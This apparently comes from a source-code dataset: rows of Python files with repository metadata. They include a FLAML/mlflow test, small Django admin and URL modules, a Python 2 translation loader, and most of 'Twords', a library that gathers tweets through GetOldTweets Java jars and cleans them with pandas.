    """Round-trip a fitted FLAML AutoML object through mlflow.

    Installs mlflow at runtime, fits on OpenML task 7592, logs the model
    with mlflow.sklearn and reloads it via both pyfunc and sklearn
    flavors; the ray-backed rerun is tolerated to fail with ImportError.
    """
    import subprocess
    import sys
    # NOTE(review): installing a package inside the test mutates the
    # environment and needs network access -- confirm this is acceptable
    # for the CI setup.
    subprocess.check_call([sys.executable, "-m", "pip", "install", "mlflow"])
    import mlflow
    from flaml.data import load_openml_task
    try:
        X_train, X_test, y_train, y_test = load_openml_task(
            task_id=7592, data_dir="test/"
        )
    except (OpenMLServerException, ChunkedEncodingError) as e:
        # Network/server failures skip the test rather than fail it.
        print(e)
        return
    """ import AutoML class from flaml package """
    from flaml import AutoML
    automl = AutoML()
    settings = {
        "time_budget": 5,  # total running time in seconds
        "metric": "accuracy",  # primary metrics can be chosen from: ['accuracy','roc_auc','roc_auc_ovr','roc_auc_ovo','f1','log_loss','mae','mse','r2']
        "estimator_list": ["lgbm", "rf", "xgboost"],  # list of ML learners
        "task": "classification",  # task type
        "sample": False,  # whether to subsample training data
        "log_file_name": "adult.log",  # flaml log file
    }
    mlflow.set_experiment("flaml")
    with mlflow.start_run() as run:
        automl.fit(X_train=X_train, y_train=y_train, **settings)
        mlflow.sklearn.log_model(automl, "automl")
    # Reload through the generic pyfunc flavor and predict.
    loaded_model = mlflow.pyfunc.load_model(f"{run.info.artifact_uri}/automl")
    print(loaded_model.predict(X_test))
    automl._mem_thres = 0
    print(automl.trainable(automl.points_to_evaluate[0]))
    # Repeat with the ray backend; tolerated to fail when ray is absent.
    settings["use_ray"] = True
    try:
        with mlflow.start_run() as run:
            automl.fit(X_train=X_train, y_train=y_train, **settings)
            mlflow.sklearn.log_model(automl, "automl")
        automl = mlflow.sklearn.load_model(f"{run.info.artifact_uri}/automl")
        print(automl.predict_proba(X_test))
    except ImportError:
        pass
    # subprocess.check_call([sys.executable, "-m", "pip", "uninstall", "mlflow"])
# The 600 s budget enables the accuracy assertion inside test_automl.
if __name__ == "__main__":
    test_automl(600)
| 5,110 | 0 | 69 |
c1e967e0502cb36c1b0d66fa783de85952b4bbed | 241 | py | Python | neighbor_app/admin.py | FloiceNyota98/Neighborhood | ef60aa45e50ec093fcccad583ccb914114d7d71f | [
"MIT"
] | 1 | 2021-07-31T07:59:56.000Z | 2021-07-31T07:59:56.000Z | neighbor_app/admin.py | FloiceNyota98/Neighborhood | ef60aa45e50ec093fcccad583ccb914114d7d71f | [
"MIT"
] | null | null | null | neighbor_app/admin.py | FloiceNyota98/Neighborhood | ef60aa45e50ec093fcccad583ccb914114d7d71f | [
"MIT"
] | 1 | 2021-08-31T09:36:53.000Z | 2021-08-31T09:36:53.000Z | from django.contrib import admin
from .models import Business, NeighborHood, Post, Profile
# Register your models here.
# Expose the neighborhood app models in the django admin site.
admin.site.register(Profile)
admin.site.register(Business)
admin.site.register(Post)
admin.site.register(NeighborHood)
| 24.1 | 57 | 0.813278 | from django.contrib import admin
from .models import Business, NeighborHood, Post, Profile
# Register your models here.
# Expose the neighborhood app models in the django admin site.
admin.site.register(Profile)
admin.site.register(Business)
admin.site.register(Post)
admin.site.register(NeighborHood)
| 0 | 0 | 0 |
d296585d1c8d998824941555345adc6ce57ce849 | 1,142 | py | Python | divico_ctrl/translation.py | imldresden/mcv-displaywall | d08cf6fab869ee03d8b3af203dd0e55b42ab4605 | [
"MIT"
] | 2 | 2019-12-12T20:57:37.000Z | 2021-09-29T02:59:19.000Z | divico_ctrl/translation.py | imldresden/mcv-displaywall | d08cf6fab869ee03d8b3af203dd0e55b42ab4605 | [
"MIT"
] | null | null | null | divico_ctrl/translation.py | imldresden/mcv-displaywall | d08cf6fab869ee03d8b3af203dd0e55b42ab4605 | [
"MIT"
] | null | null | null | import json
import os
# Module-level singleton; loads the json translation tables on import.
T = Translation()
| 30.864865 | 95 | 0.585814 | import json
import os
class Translation(object):
    """Loads UI message translations from json asset files.

    Python 2 code: relies on dict.iteritems, unicode and the print
    statement.
    """
    def __init__(self, default_lang='de'):
        # language code -> {message: translation} mapping
        self.__langs = {}
        self.__default_lang = default_lang
        # loading translations
        path = os.path.dirname(os.path.abspath(__file__))
        lang_files = {
            'de': path + '/../assets/translations/de.json',
            'en': path + '/../assets/translations/en.json'
        }
        for key, file in lang_files.iteritems():
            with open(file) as data_file:
                self.__langs[key] = json.load(data_file)
    def tl(self, msg, lang=None):
        # Translate msg into lang (default language when lang is None);
        # falls back to msg itself when no translation is available.
        language = self.__default_lang if lang is None else lang
        # An empty translation table means "pass messages through".
        if len(self.__langs[language]) == 0:
            return msg
        # NOTE(review): this assert runs after self.__langs[language]
        # was already indexed above, so an unknown language raises
        # KeyError before the assert can fire.
        assert language in self.__langs
        result = msg
        if msg in self.__langs[language]:
            unic = unicode(self.__langs[language][msg])
            result = unic.encode('utf-8')
        else:
            # todo use logging_base for the following debug output
            print "Translation: \'{}\' not found! Please add message to json file.".format(msg)
        return result
# Module-level singleton; loads the json translation tables on import.
T = Translation()
| 1,018 | 5 | 76 |
cbec29e23f3954ee6849cec0a554ca2c1e06eec3 | 439 | py | Python | rudra/rudra/urls.py | nerddesire/django-practice | bb9c626941240b7ee0fdc22cbc4e762ff422d30f | [
"Apache-2.0"
] | null | null | null | rudra/rudra/urls.py | nerddesire/django-practice | bb9c626941240b7ee0fdc22cbc4e762ff422d30f | [
"Apache-2.0"
] | null | null | null | rudra/rudra/urls.py | nerddesire/django-practice | bb9c626941240b7ee0fdc22cbc4e762ff422d30f | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import include, url
from django.contrib import admin
from inventory import views as inventory_index
urlpatterns = [
    # Examples:
    # url(r'^$', 'rudra.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),
    # Inventory landing page.
    url(r'^$', inventory_index.index, name='index'),
    # Item detail; the captured numeric id is passed as the `id` kwarg.
    # NOTE(review): pattern is not anchored with '$', so longer paths
    # beginning with item/<id>/ also match -- confirm this is intended.
    url(r'^item/(?P<id>\d+)/', inventory_index.item_detail, name='item_detail'),
    url(r'^admin/', include(admin.site.urls)),
]
| 29.266667 | 80 | 0.651481 | from django.conf.urls import include, url
from django.contrib import admin
from inventory import views as inventory_index
urlpatterns = [
    # Examples:
    # url(r'^$', 'rudra.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),
    # Inventory landing page.
    url(r'^$', inventory_index.index, name='index'),
    # Item detail; the captured numeric id is passed as the `id` kwarg.
    # NOTE(review): pattern is not anchored with '$', so longer paths
    # beginning with item/<id>/ also match -- confirm this is intended.
    url(r'^item/(?P<id>\d+)/', inventory_index.item_detail, name='item_detail'),
    url(r'^admin/', include(admin.site.urls)),
]
| 0 | 0 | 0 |
1314845f31133e2f039af920f60d0139625cdac7 | 51,179 | py | Python | twords/twords.py | ddandur/Twords | 63675d89af8d8c7fda939a3e3911ccc4417644a9 | [
"MIT"
] | 17 | 2017-08-16T12:27:16.000Z | 2021-05-23T12:41:56.000Z | twords/twords.py | ddandur/Twords | 63675d89af8d8c7fda939a3e3911ccc4417644a9 | [
"MIT"
] | null | null | null | twords/twords.py | ddandur/Twords | 63675d89af8d8c7fda939a3e3911ccc4417644a9 | [
"MIT"
] | 7 | 2017-08-15T13:20:42.000Z | 2020-03-01T16:59:50.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import datetime
import string
from os import listdir
from os.path import join as pathjoin
from math import log, ceil
import subprocess
import pandas as pd
import nltk
from nltk.corpus import stopwords
import matplotlib.pyplot as plt
import tailer
from ttp import ttp
# use this if you want to include modules from a subfolder
#cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"GetOldTweets-python")))
#if cmd_subfolder not in sys.path:
# sys.path.insert(0, cmd_subfolder)
# Show full (untruncated) column contents when printing DataFrames.
# NOTE(review): pandas >= 1.0 deprecates -1 here in favour of None --
# confirm the pandas version this repo targets before changing it.
pd.set_option('display.max_colwidth', -1)
class Twords(object):
""" Object that takes in tweets from Java twitter search engine and allows
manipulation, analysis and visualization.
Attributes:
jar_folder_path (string): path to where java jar twitter search files
are stored
data_path (string): path to data set from java twitter search.
It can be either path to single file, or path to
directory containing several csv files. Files are
assumed to be in format give by output of
create_java_tweets function below
background_path (string): path to background data. Form of background
data file is csv with columns 'word', 'occurrences',
and 'frequency' for words as they occur in some
background corpus.
background_dict (dictionary): dictionary of background rates of English
words, used in comparing word frequencies.
Can be set using create_Background_dict
function.
search_terms (list of strings): list of search terms used when collecting
tweets using create_java_tweets
tweets_df (pandas dataframe): pandas dataframe that holds all tweet data.
This is central object in an instance of
Twords.
word_bag (list of strings): list of all word tokens in tweets contained
in tweets_df, not including stop words (stop
words are contained in self.stop_words)
stop_words (list of string): list of words that shouldn't be included when
computing word bag for tweets. This includes
standard English words like "the" as well as
Twitter-data-specific things like "https://"
freq_dist (nltk object): nltk.FreqDist(self.word_bag); nltk object that
contains statistical properties of words in
word_bag
word_freq_df (pandas dataframe): pandas dataframe containing top n words
in tweets data along with data like
word frequency, word frequency divided
by background frequency for that word, etc.
More info under function
create_word_freq_df(self, n),
which creates word_freq_df.
"""
#############################################################
# Methods to set attributes
#############################################################
def set_Search_terms(self, search_terms):
""" search_terms is a list of strings that were used in twitter search
to obtain data in tweets_df.
The strings will be converted to unicode inside Twords, even though the
user may enter them as ordinary strings.
"""
assert type(search_terms) == list
for term in search_terms:
assert type(term) in (str, unicode)
unicode_list = [x.decode("utf-8") if type(x) == str
else x for x in search_terms]
self.search_terms = unicode_list
def create_Background_dict(self):
""" Create the dictionary of background word rates from file in the
background data path.
key: word (string)
value: tuple of form (frequency, occurrences), where
frequency is frequency of word in background data set, and
occurrences is total number of occurrences in background data
set
"""
sample_rates = pd.read_csv(self.background_path, sep=",", encoding='utf-8')
background_dict = dict(zip(sample_rates["word"], zip(sample_rates["frequency"],sample_rates["occurrences"])))
self.background_dict = background_dict
def create_Stop_words(self):
""" Create list of stop words used in create_word_bag function.
Stop words created here are defaults - the user may add new stop words
later with the add_stop_words function.
This default list combines English stopwords from nltk corpus
(stopwords), punctuation marks from python standard string library,
and a custom-list the author found useful when parsing tweets.
"""
punctuation = [item.decode('utf-8') for item in list(string.punctuation)]
stop = stopwords.words('english') + punctuation + \
[u'rt', u'RT', u'via', u'http', u"n't", u"'s", u"...", u"''",
u"'m", u"--", u"'ll", u"'ve", u"'re", u"//www"]
self.stop_words = stop
##############################################################
# Methods to gather tweets via keyword search with
# Java GetOldTweets
##############################################################
    def create_java_tweets(self, total_num_tweets, tweets_per_run, querysearch,
                           final_until=None, output_folder="output",
                           decay_factor=4, all_tweets=True):
        """ Function that calls java program iteratively further and further
        back in time until the desired number of tweets are collected. The
        "until" parameter gives the most recent date tweets can be found from,
        and the search function works backward in time progressively from that
        date until the max number of tweets are found. Thus each new call to
        _get_one_java_run_and_return_last_line_date will start the search one
        day further in the past.

        total_num_tweets: (int) total number of tweets to collect
        tweets_per_run: (int) number of tweets in call to java program - should
                        not be over 50,000, better to keep around 10,000
        querysearch: (string) string defining query for twitter search - see
                        Henrique code
                        (e.g, "europe refugees" for search for tweets containing
                        BOTH "europe" and "refugees" - currently putting in OR by
                        hand does not yield desired result, so two separate
                        searches will have to be done for "OR" between words)
        final_until: (string) date string of the form '2015-07-31' that gives
                        ending date that tweets are searched before (this is
                        distinguished from the changing "until" that is used in
                        the calls to _get_one_java_run_and_return_last_line_date).
                        If left as "None" it defaults to the current date.
        output_folder: (string) name of folder to put output in
        decay_factor: (int) how quickly to wind down tweet search if errors
                        occur and no tweets are found in a run - a failed run
                        will count as tweets_per_run/decay_factor tweets found,
                        so the higher the factor the longer the program will try
                        to search for tweets even if it gathers none in a run
        all_tweets: (bool) flag for which jar to use - True means use
                        all_tweets jar, False means use top_tweets jar

        Side effects: creates output_folder full of csv files, and sets
        self.data_path and self.search_terms for subsequent loading.
        """
        # default to today's date when no end date is given
        if final_until is None:
            final_until = str(datetime.datetime.now())[:10]

        print "Collecting", str(total_num_tweets), "tweets with", \
              str(tweets_per_run), "tweets per run."
        print "Expecting", \
              str(int(ceil(total_num_tweets/float(tweets_per_run)))), \
              "total runs"

        start_time = time.time()
        tweets_searched = 0
        run_counter = 1
        # create folder that tweets will be saved into
        subprocess.call(['mkdir', output_folder])
        until = final_until
        while tweets_searched < total_num_tweets:
            print "Collecting run", run_counter
            run_counter += 1
            # call java program and get date of last tweet found
            last_date = self._get_one_java_run_and_return_last_line_date(
                            querysearch, until, tweets_per_run, all_tweets)
            # rename each output file and put into new folder - output file
            # is named by until date
            new_file_location = output_folder + '/' + querysearch + '_' + \
                                until + '.csv'
            subprocess.call(['mv', 'output_got.csv', new_file_location])
            # if last_date is usual date proceed as normal - if not raise error
            # and stop search
            if self._validate_date(last_date):
                until = last_date
                tweets_searched += tweets_per_run
            else:
                # run returned no parsable date: set search date one day
                # further in past and keep going
                new_until_date_object = datetime.datetime.strptime(until, '%Y-%m-%d') \
                                        - datetime.timedelta(days=1)
                until = str(new_until_date_object)[:10]
                # consider this a few tweets searched so program doesn't run
                # forever if it gathers no tweets
                tweets_searched += (tweets_per_run)/float(decay_factor)
        self.data_path = output_folder
        self.search_terms = querysearch.split()
        print "Total time to collect", str(total_num_tweets), "tweets:", \
              round((time.time() - start_time)/60.,1), "minutes"
    def get_tweets_from_single_java_csv(self):
        """ Takes path to twitter data obtained with java tweet search library
        and builds a dataframe of the tweets and their accompanying
        information. Dataframe has columns for username, date, retweets,
        favorites, text, mentions, and hashtag. The dataframe is stored under
        the attribute tweets_df.
        """
        # Read in csv file with many columns to account for people who put many
        # semicolons in tweets, then keep only the rows that don't have
        # semicolons in a tweet by dropping rows with too many columns.
        # (Semicolons are the delimeter in the java twitter search library.)
        tweets = pd.read_csv(self.data_path, sep=";",
                             names=list('abcdefghijklmno'), encoding='utf-8')
        # rows where column 'k' is populated overflowed the expected number
        # of fields (semicolons inside the tweet text), so drop them
        tweets = tweets[tweets.k.isnull()]

        # Rename the columns with correct labels and drop row that is just
        # column names (this will index dataframe starting at 1).
        tweets.columns = tweets.iloc[0]
        tweets.drop(0, inplace=True)

        # Drop the extra columns on the end
        tweets = tweets[["username", "date", "retweets", "favorites", "text",
                         "mentions", "hashtags", "id", "permalink"]]

        # Reindex dataframe
        tweets.index = range(len(tweets))
        self.tweets_df = tweets
    def get_java_tweets_from_csv_list(self, list_of_csv_files=None):
        """ Create tweets_df from list of tweet csv files

        list_of_csv_files: python list of paths (the paths are strings) to csv
                           files containing tweets - if list_of_csv_files is
                           None then the files contained inside self.data_path
                           are used
        """
        if list_of_csv_files is None:
            list_of_csv_files = self._get_list_of_csv_files(self.data_path)
        path_dict = {}
        # create dictionary with paths for keys and corresponding tweets
        # dataframe for values
        for path in list_of_csv_files:
            # same parsing steps as get_tweets_from_single_java_csv: read with
            # surplus columns, drop rows that overflowed into column 'k'
            # (semicolons inside the tweet), promote first row to headers,
            # keep only the expected columns, reindex
            tweets = pd.read_csv(path, sep=";", names=list('abcdefghijklmno'),
                                 encoding='utf-8')
            tweets = tweets[tweets.k.isnull()]
            tweets.columns = tweets.iloc[0]
            tweets.drop(0, inplace=True)
            tweets = tweets[["username", "date", "retweets", "favorites",
                             "text", "mentions", "hashtags", "id", "permalink"]]
            tweets.index = range(len(tweets))
            path_dict[path] = tweets

        # join all created dataframes together into final tweets_df dataframe
        self.tweets_df = pd.concat(path_dict.values(), ignore_index=True)
    def _get_one_java_run_and_return_last_line_date(self, querysearch, until,
                                                    maxtweets, all_tweets=True,
                                                    since=None,
                                                    return_line=True):
        """ Create one java csv using java jar (either Top Tweets or All tweets
        as specified in all_tweets tag) and return date string from last tweet
        collected.

        querysearch: (string) query string, usually one word - multiple words
                     imply an "AND" between them
        maxtweets: (int) number of tweets to return
        since: (string of form '2015-09-30') string of date to search since;
               this is optional and won't be used when using the
               create_java_tweets function
        until: (string of form '2015-09-30') string of date to search until,
               since search is conducted backwards in time
        return_line (bool): whether to return date from last line or not; if
                            true the date from the last line in the csv is
                            returned
        """
        start_time = time.time()
        # choose which jar file to use
        jar_string = self.jar_folder_path + '/got_top_tweets.jar'
        if all_tweets:
            jar_string = self.jar_folder_path + '/got_all_tweets.jar'

        # create search string; querysearch is quoted so multi-word queries
        # survive as a single java argument
        quotation_mark = '"'
        query_string = 'querysearch=' + quotation_mark + querysearch + quotation_mark
        until_string = 'until=' + until
        maxtweets_string = 'maxtweets=' + str(maxtweets)

        # create output_got.csv file of tweets with these search parameters
        if since is None:
            subprocess.call(['java', '-jar', jar_string, query_string,
                             until_string, maxtweets_string])
        else:
            since_string = 'since=' + since
            subprocess.call(['java', '-jar', jar_string, query_string,
                             since_string, until_string, maxtweets_string])

        # find date on last tweet in this file (in last line of file);
        # the date is the 10-character field just after the first semicolon
        # delimiter of the line
        last_line = tailer.tail(open('output_got.csv'), 1)[0]
        date_position = last_line.find(';')
        date_string = last_line[date_position+1:date_position+11]
        date_string = self._convert_date_to_standard(date_string)
        print "Time to collect", str(maxtweets), "tweets:", \
              round((time.time() - start_time)/60., 1), "minutes"
        if return_line:
            return date_string
def _get_list_of_csv_files(self, directory_path):
""" Return list of csv files inside a directory
directory_path: (string) path to directory holding csv files of
interest
"""
return [pathjoin(directory_path, f) for f in listdir(directory_path)
if f[-4:] == '.csv']
def _validate_date(self, date_text):
""" Return true if date_text is string of form '2015-06-29',
false otherwise.
date_text (string): date
"""
try:
datetime.datetime.strptime(date_text, '%Y-%m-%d')
return True
except ValueError:
return False
##############################################################
# Methods to gather user timeline tweets with
# Java GetOldTweets
##############################################################
def get_user_tweets(self, user, max_tweets, start_date=None,
end_date=None, all_tweets=True, return_line=True):
""" Returns max_tweets from Twitter timeline of user. Appears to work
better when start and end dates are included. The returned tweets
include tweets on the start_date, and up to (but not including) tweets
on the end_date.
If only an end_date is provided, then the tweets are searched backward
in time starting at the end date and continuing until max_tweets
have been found.
Creates folder named by twitter username searched that contains tweets
in series of csv files.
user (string): Twitter handle of user, e.g. barackobama
max_tweets (int): number of tweets to return for that user; set
max_tweets to -1 to return all tweets in timeline
start_date (string): starting date for search of form "2015-09-30"
end_date (string): ending date for search of form "2015-09-30"
all_tweets (bool): whether to use "top_tweets" or "all_tweets" java
jar file
return_line (bool): whether to return date on last tweet returned;
needed for function that makes repeated calls to
this function, e.g. get_all_user_tweets
"""
start_time = time.time()
# choose which jar file to use
jar_string = self.jar_folder_path + '/got_top_tweets.jar'
if all_tweets:
jar_string = self.jar_folder_path + '/got_all_tweets.jar'
# create search string
user_string = 'username=' + user
maxtweets_string = 'maxtweets=' + str(max_tweets)
if start_date is not None:
since_string = 'since=' + start_date
if end_date is not None:
until_string = 'until=' + end_date
# create output_got.csv file of tweets with these search parameters
if start_date is None and end_date is None:
subprocess.call(['java', '-jar', jar_string, user_string,
maxtweets_string])
elif start_date is None and end_date is not None:
subprocess.call(['java', '-jar', jar_string, user_string,
until_string, maxtweets_string])
else:
subprocess.call(['java', '-jar', jar_string, user_string,
since_string, until_string, maxtweets_string])
# find date on last tweet in this file (in last line of file)
last_line = tailer.tail(open('output_got.csv'), 1)[0]
date_position = last_line.find(';')
date_string = last_line[date_position+1:date_position+11]
date_string = self._convert_date_to_standard(date_string)
print "Time to collect", str(max_tweets), "tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
if return_line:
return date_string
    def get_all_user_tweets(self, user, tweets_per_run):
        """ Return all tweets in a user's timeline. This is necessary
        to do in batches since one call to get_user_tweets does not return
        all of the tweets (too many in one run breaks the web-scrolling
        functionality of GetOldTweets). The tweets are saved as series of
        csv files into output folder named by username of twitter user.

        The final date is one day after the current date, since tweets are
        returned up to (but not including) the end_date in get_user_tweets
        function.

        This function will return duplicates of some tweets to be sure all
        tweets are obtained - these can be eliminated by simply dropping
        duplicates in the text column of resulting pandas dataframe.

        Function typically fails to return every single tweet, but captures
        most (~87 percent for barackobama) - best performance when
        tweets_per_run is around 500.

        Creates: folder (named by username searched) of csv files

        user (string): twitter handle of user, e.g. "barackobama"
        tweets_per_run (int): how many tweets to pull in each run
        """
        # increment the date one day forward from returned day when calling
        # get_user_tweets to be sure all tweets in overlapping
        # range are returned - experimentation showed that tweets on the edge
        # between date runs can be lost otherwise
        start_time = time.time()
        print "Collecting tweets with", str(tweets_per_run), "tweets per run."
        # create folder that tweets will be saved into
        subprocess.call(['mkdir', user])
        # set one day in future so that all tweets up to today are returned;
        # necessary because tweets are returned on dates up to but not
        # including end date
        final_until = str(datetime.datetime.now() +
                          datetime.timedelta(days=1))[:10]
        until = final_until
        continue_search = True
        run_counter = 1
        # loop until a run's csv ends in something that is not a parsable
        # date, which signals no more tweets were found
        while continue_search:
            print "Collecting run", run_counter
            run_counter += 1
            # call user function and get date of last tweet found
            last_date = self.get_user_tweets(user, tweets_per_run,
                                             end_date=until)
            # rename each output file and put into new folder - output file
            # is named by until date
            new_file_location = user + '/' + until + '.csv'
            subprocess.call(['mv', 'output_got.csv', new_file_location])
            # if last_date is a date proceed as normal - if the last_date
            # hasn't changed, raise comment below
            if self._validate_date(last_date):
                until_minus_day_object = datetime.datetime.strptime(until, '%Y-%m-%d') \
                                         - datetime.timedelta(days=1)
                until_minus_day = str(until_minus_day_object)[:10]
                if last_date == until_minus_day:
                    # from experimentation sometimes a query of many tweets
                    # will get "stuck" on a day long before 500 tweets have
                    # been reached - solution is just increment day as usual
                    print "Tweets timeline incremented by only one day - may " \
                          "need larger tweets_per_run, or could just be " \
                          "regular stutter in querying timeline."
                    until = last_date
                else:
                    # this increment is to avoid losing tweets at the edge
                    # between date queries - experimentation showed they can
                    # be lost without this redundancy - this means when tweets
                    # are read there may be duplicates that require deletion
                    new_until_date_object = datetime.datetime.strptime(last_date, '%Y-%m-%d') \
                                            + datetime.timedelta(days=1)
                    until = str(new_until_date_object)[:10]
            else:
                continue_search = False

        # set data path to new output folder to read in new tweets easily
        self.data_path = user
        print "Total time to collect tweets:", \
              round((time.time() - start_time)/60.,1), "minutes"
#############################################################
# Methods to clean and prune tweets (probably used
# before visual inspection)
#############################################################
    def keep_column_of_original_tweets(self):
        """ Copy the raw tweet text into an "original_tweets" column of
        self.tweets_df so it survives later cleaning of the "text" column.
        Can be useful for comparison after cleaning.

        This should be done before any cleaning functions are applied to the
        "text" column of self.tweets_df.
        """
        self.tweets_df["original_tweets"] = self.tweets_df["text"]
def lower_tweets(self):
""" Lowers case of text in all the tweets, usernames, mentions and
hashtags in the tweets_df dataframe, if the dataframe has those
columns.
"""
column_names = list(self.tweets_df.columns.values)
if "username" in column_names:
self.tweets_df["username"] = self.tweets_df.username.str.lower()
if "text" in column_names:
self.tweets_df["text"] = self.tweets_df.text.str.lower()
if "mentions" in column_names:
self.tweets_df["mentions"] = self.tweets_df.mentions.str.lower()
if "hashtags" in column_names:
self.tweets_df["hashtags"] = self.tweets_df.hashtags.str.lower()
def keep_only_unicode_tweet_text(self):
""" Keeps only tweets where tweet text is unicode. This drops the
occasional tweet that has a NaN value in dataset, which becomes a float
when read into tweets_df.
"""
self.tweets_df["text_type"] = self.tweets_df["text"].map(lambda text: type(text))
self.tweets_df = self.tweets_df[self.tweets_df.text_type == unicode]
del self.tweets_df["text_type"]
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def _remove_urls_from_single_tweet(self, tweet):
""" Remove urls from text of a single tweet.
This uses python tweet parsing library that misses some tweets but
doesn't get hung up with evil regex taking too long.
"""
p = ttp.Parser()
result = p.parse(tweet)
for x in result.urls:
tweet = tweet.replace(x, "")
tweet = tweet.strip()
return tweet
    def remove_urls_from_tweets(self):
        """ Remove urls from all tweets in self.tweets_df.

        Applies _remove_urls_from_single_tweet to the "text" column in
        place and prints progress/timing information to stdout.
        """
        start_time = time.time()
        print "Removing urls from tweets..."
        print "This may take a minute - cleaning rate is about 400,000" \
              " tweets per minute"
        self.tweets_df["text"] = self.tweets_df["text"].map(self._remove_urls_from_single_tweet)

        minutes_to_complete = (time.time() - start_time)/60.
        print "Time to complete:", round(minutes_to_complete,3), \
              "minutes"
        print "Tweets cleaned per minute:", round(len(self.tweets_df)/minutes_to_complete, 1)
def remove_punctuation_from_tweets(self):
""" Strip common punctuation from tweets in self.tweets_df
"""
self.tweets_df["text"] = self.tweets_df["text"].apply(lambda x:
''.join([i for i in x if i not in
string.punctuation]))
def drop_non_ascii_characters_from_tweets(self):
""" Remove all characters that are not standard ascii.
"""
self.tweets_df['text'] = self.tweets_df["text"].apply(lambda x:
''.join([i if 32 <= ord(i) < 126 else
"" for i in x]))
def _convert_date_to_standard(self, date_text):
""" Convert a date string of form u"yyyy/mm/dd" into form u"yyyy-mm-dd"
for use with the python date module.
"""
assert type(date_text) in (str, unicode)
date_text = date_text.replace('/', '-')
return date_text
def convert_tweet_dates_to_standard(self):
""" Convert tweet dates from form "yyyy/mm/dd" to "yyyy-mm-dd" in
tweets_df dataframe.
"""
self.tweets_df["date"] = self.tweets_df["date"].map(self._convert_date_to_standard)
def sort_tweets_by_date(self):
""" Sort tweets by their date - useful for any sort of time series
analysis, e.g. analyzing sentiment changes over time.
"""
self.tweets_df.sort_values("date", inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def drop_duplicate_tweets(self):
""" Drop duplicate tweets in tweets_df (except for the first instance
of each tweet)
"""
self.tweets_df.drop_duplicates("text", inplace=True)
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
    def drop_by_search_in_name(self):
        """ Drop tweets that contain element from search_terms in either
        username or mention (i.e., tweets where the search term in contained in
        twitter handle of someone writing or mentioned in tweet). Default
        values of terms list is search_terms attribute, but user can add
        to self.search_terms attribute to drop by additional terms.
        """
        if not self.search_terms:
            print "search_terms is empty - add at least one term to " + \
                  "search_terms attribute"
            return self
        # validate the search terms before touching the dataframe
        for term in self.search_terms:
            assert type(term) in (str, unicode)
            assert term # to make sure string isn't empty

        # Drop the tweets that contain any of search terms in either a username
        # or a mention
        column_names = list(self.tweets_df.columns.values)
        for term in self.search_terms:
            if "mentions" in column_names:
                # NOTE(review): the explicit "== True" comparison presumably
                # also coerces NaN results of str.contains (from missing
                # values) to False - confirm before simplifying
                mentions_index = self.tweets_df[self.tweets_df.mentions.str.contains(term) == True].index
                self.tweets_df.drop(mentions_index, inplace=True)
            if "username" in column_names:
                username_index = self.tweets_df[self.tweets_df.username.str.contains(term) == True].index
                self.tweets_df.drop(username_index, inplace=True)

        # Reindex dataframe
        self.tweets_df.index = range(len(self.tweets_df))
    def keep_tweets_with_terms(self, term_list):
        """ Drops all the tweets in tweets_df that do NOT contain at least one
        term from term_list. This is useful for handling data from Twitter API
        search stream, where it is often easiest to collect a single big stream
        using several search terms and then parse the stream later.

        Sometimes even tweets collected with java collector don't contain
        desired terms, so this can be useful there as well.

        term_list (string or list of strings): collection of terms to drop on

        NOTE(review): a unicode term_list matches neither branch below and is
        silently ignored - callers should pass a byte string or list.
        """
        if type(term_list) == str:
            assert len(term_list) > 0
            # labels of rows whose text contains the term
            keep_index = self.tweets_df[self.tweets_df.text.str.contains(term_list) == True].index
            # NOTE(review): iloc is positional; this works only because
            # tweets_df is kept reindexed to 0..n-1 throughout the class,
            # so labels equal positions - confirm before reusing elsewhere
            self.tweets_df = self.tweets_df.iloc[keep_index]

        if type(term_list) == list:
            # accumulate (possibly overlapping) matching row labels per term,
            # then deduplicate before filtering
            # NOTE(review): pd.core.index.Int64Index is a deprecated/removed
            # API in modern pandas - this file targets an old pandas version
            keep_index = pd.core.index.Int64Index([], dtype='int64')
            for term in term_list:
                assert len(term) > 0
                term_keep_index = self.tweets_df[self.tweets_df.text.str.contains(term) == True].index
                keep_index = keep_index.append(term_keep_index)
            keep_index = keep_index.drop_duplicates()
            self.tweets_df = self.tweets_df.iloc[keep_index]

        # Reindex dataframe
        self.tweets_df.index = range(len(self.tweets_df))
#############################################################
# Methods to prune tweets (probably used after visual
# inspection)
#############################################################
    def drop_by_term_in_name(self, terms):
        """ Drop tweets that contain element from terms in either username or
        mention. The terms parameter must be a list of strings.

        This method is the same as drop_by_search_in_name method, except it
        takes arbitrary input from user. This can be used to help get rid of
        spam.

        terms (list): python list of strings
        """
        if not terms:
            print "terms is empty - enter at least one search terms string"
            return self
        # validate the terms before touching the dataframe
        for term in terms:
            assert type(term) in (str, unicode)
            assert term

        # Drop the tweets that contain any of terms in either a username
        # or a mention
        # NOTE(review): the "== True" comparison presumably coerces NaN
        # results of str.contains (from missing values) to False, so it is
        # not strictly redundant - confirm before simplifying
        column_names = list(self.tweets_df.columns.values)
        for term in terms:
            if "mentions" in column_names:
                mentions_index = self.tweets_df[self.tweets_df.mentions.str.contains(term) == True].index
                self.tweets_df.drop(mentions_index, inplace=True)
            if "username" in column_names:
                username_index = self.tweets_df[self.tweets_df.username.str.contains(term) == True].index
                self.tweets_df.drop(username_index, inplace=True)

        # Reindex dataframe
        self.tweets_df.index = range(len(self.tweets_df))
    def drop_by_term_in_tweet(self, terms):
        """ Drop tweets that contain element from terms in the tweet text.
        Terms can be either a string (which is treated as one term) or a list
        of strings (which area each treated as a separate drop case).

        This is most useful for getting rid of repetitive or spammy tweets that
        appear to be distorting data.

        This is also useful for dropping retweets, which can be accomplished
        by dropping tweets containing the string "rt @"

        terms (string or python list of strings): terms that appear in tweets
                                                  we want to drop

        Raises Exception when terms is neither a string nor a list.
        """
        if type(terms) in (str, unicode):
            # single term: drop every tweet whose text contains it
            text_index = self.tweets_df[self.tweets_df.text.str.contains(terms) == True].index
            self.tweets_df.drop(text_index, inplace=True)
        elif type(terms) == list:
            # list of terms: drop matches for each term in turn
            for term in terms:
                assert type(term) in (str, unicode)
                assert len(term) > 0
